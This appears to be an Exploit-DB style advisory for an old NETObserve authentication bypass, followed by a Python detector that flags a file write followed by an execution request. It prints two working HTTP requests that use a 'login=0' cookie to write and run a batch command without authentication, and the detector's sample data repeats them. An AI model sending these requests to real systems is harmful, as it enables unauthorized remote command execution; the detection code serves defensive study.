Vendor: NETObserve
By: SecurityFocus
CVSS: 7.5 (HIGH)
Remote Unauthenticated Access
CWE: 287
Product Name: NETObserve
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

NETObserve Remote Unauthenticated Access Vulnerability

NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. An attacker can exploit this vulnerability by sending a POST request with a malicious payload to the vulnerable server, followed by a GET request to execute the malicious payload. This may result in remote compromise of the system.

Mitigation:

Ensure that the software is updated to the latest version and that all users are authenticated before granting access to the system.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9319/info

NETObserve is prone to a vulnerability that may permit remote unauthenticated users to access functions of the software. Due to the nature of the software, this could permit an attacker to execute commands remotely on an underlying system running the software. This may also expose privileged information about the system and its users. Successful exploitation will result in remote compromise of the system. 

REQUEST #1:

--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------

REQUEST #2:

--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0


--------------------------------------------------------------------------
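
A defender-side check for the pattern in the two requests above, added here as an example (it is not part of the original advisory or the vendor's code): it correlates a POST to `/sendeditfile` with a later GET to `/runfile=` for the same file in captured HTTP requests. The capture format (client address plus raw request text), the function names and the sample events are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, rest = lines[0].split(" ", 1)
    target = rest.rsplit(" ", 1)[0]              # tolerate spaces inside the path
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def file_arg(kind, text):
    """Return the file path from 'kind=?path?' (the form used on this page), lowercased."""
    m = re.search(re.escape(kind) + r"=\?(.*?)\?", text, re.IGNORECASE)
    return m.group(1).lower() if m else None     # Windows paths are case-insensitive

def find_write_then_run(events):
    """Alert when a file written through /sendeditfile is later requested via /runfile=."""
    written, alerts = {}, []
    for client, raw in events:
        method, target, headers, body = parse_request(raw)
        if method == "POST" and target.lower().startswith("/sendeditfile"):
            path = file_arg("editfile", headers.get("referer", ""))
            if path:
                written[path] = (client, parse_qs(body).get("newfiledata", [""])[0])
        elif method == "GET":
            path = file_arg("runfile", target)
            if path in written:
                writer, content = written[path]
                alerts.append({"path": path, "writer": writer, "runner": client,
                               "content": content, "cookie": headers.get("cookie", "")})
    return alerts

# Constructed capture: the page's two requests plus one unrelated runfile request.
EVENTS = [
    ("192.0.2.10", "POST /sendeditfile HTTP/1.1\nReferer: http://127.0.0.1/editfile=?C:\\WINDOWS\\win.bat?\n"
                   "Host: AnyHostWillDo\nCookie: login=0\n\nnewfiledata=cmd+%2Fc+calc"),
    ("192.0.2.77", "GET /runfile=?C:\\tools\\backup.bat? HTTP/1.1\nHost: AnyHostWillDo\n\n"),
    ("192.0.2.10", "GET /runfile=?C:\\windows\\win.bat? HTTP/1.1\nHost: AnyHostWillDo\nCookie: login=0\n\n"),
]

if __name__ == "__main__":
    for alert in find_write_then_run(EVENTS):
        print(alert)
```

The match is keyed on the file path alone, so a write from one address followed by a run from another is still reported, with both addresses in the alert.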